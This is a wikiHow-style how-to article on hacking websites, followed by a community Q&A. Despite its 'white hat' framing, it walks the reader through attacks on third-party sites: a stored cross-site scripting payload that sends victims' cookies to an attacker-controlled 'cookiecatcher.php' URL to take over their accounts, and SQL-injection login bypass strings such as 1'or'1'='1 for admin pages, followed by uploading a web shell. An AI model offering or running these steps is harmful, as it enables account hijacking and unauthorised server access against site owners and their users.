How to Hack a Website

Last Updated: December 4, 2021

Some people assume that all hackers have nefarious intentions, but that’s not true! Some hackers, called “white hat” hackers, hack websites to try to weed out any potential weaknesses in a company’s security systems so they can warn the company about them. Other people learn how to hack websites so they can shore up their own business’s website security and protect themselves from hackers who actually do have bad intentions. This wikiHow covers two ways you can hack a website for those who want to become a “good” hacker, plus some tips that will help set you up for success.

Method 1

Method 1 of 3:
Using Cross-Site Scripting

1
Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.
2
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
- You'll want to test to see if the system filters out code. Post
```
<script>window.alert("test")</script>
```
  If an alert box appears when you click on your post, then the site is vulnerable to attack.
Advertisement
3
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
4
Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
- An example code would look like
  <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
5
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

Advertisement

Method 2

Method 2 of 3:
Executing Injection Attacks

1
Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching on your favorite search engine for admin login.asp or admin login.php.
2
Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1'or'1'='1 or 2'='2.
3
Be patient. This is probably going to require a little trial and error.
4
Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack. Then, logged in as an administrator, you can perform further actions, such as uploading a web shell to gain server-side access if you can perform a file upload.

Advertisement

Method 3

Method 3 of 3:
Setting Up for Success

1
Learn a programming language or two. If you want to really learn how to hack websites, you'll need to understand how computers and other technologies work. Learn to use programming languages like Python, PHP (necessary for exploiting server-side vulnerabilities) or SQL, so that you can gain better control of computers and identify vulnerabilities in systems.
2
Have basic HTML literacy. You will also need to have a really good understanding of HTML and JavaScript if you want to hack websites in particular. This can take time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
3
Consult with whitehats. Whitehats are hackers who use their powers for good, exposing security vulnerabilities and making the internet a better place for everyone. If you're wanting to learn to hack and use your powers for good or if you want to help protect your own website, you might want to contact some current whitehats for advice.
4
Research hacking. If you're wanting to learn to hack or if you just want to protect yourself, you'll need to do a lot of research. There are so many different ways that websites can be vulnerable and the list is ever-changing, so you will need to be constantly learning.
5
Keep up to date. Because the list of possible hacks is ever-changing, and new vulnerabilites are discovered, you'll need to be sure you keep up to date. Just because you’re protected from a certain type of hack now doesn't mean you'll be safe in the future!

Advertisement

Sample Cookie Catcher Code

Support wikiHow and unlock all samples.

Community Q&A

Question

Can I get caught while hacking?

Community Answer

Yes, you can get caught, and you can also get in serious legal trouble for it depending on the nature of your hacking.
Question

Can I learn programming online for free?

flying 8lack

Community Answer

Yes, you can find interactive python learning or you could use a written tutorial made by others, but remember to understand the code and don't just copy and paste it.
Question

How can I quickly learn Python or Sql when I already have experience in other programming languages?

Community Answer

Learn to make variables and most base functions. Python shares a lot of the same methods as C, for example.
Question

What does it mean when it says 'alert(1")'?

Community Answer

If you use window.alert and an alert pops up, it is vulnerable.
Question

What does it mean when it says Alert(XSS)?

Community Answer

That means a message is going to pop up saying the variable XSS.
Question

What code can you write in Notepad?

Community Answer

You can write any code in Notepad, you just have to save the file in required format. However, for executing that code, you need some software; for example for HTML you need browser , for Java you need jav jdk.
Question

Can I hack using Python?

Community Answer

You can't expect to hack a site by knowing a single programming language and nothing about html and/or javascript. It is also important to note that hacking is illegal, and you face consequences if you get caught.
Question

What does Window.Alert(test) do?

Community Answer

Window.Alert is a Javascript function that calls up an alert window containing text.
Question

How can I protect my site from being hacked?

Community Answer

The least time consuming way is to hire freelancers that find and patch vulnerabilities in your website. It's called ethical hacking.
Question

How can I see if any Javascript is going to pop up?

Community Answer

You will need to post a Javascript in the website, like 'window.alert ('test').' this script makes an alert window, and, if that happens, it is vulnerable or hackable.

Show more answers

Warnings

If you read this article you do not immediately become a hacker. You MUST explore your skills and practice, practice, practice.

Thanks!
Helpful 9 Not Helpful 0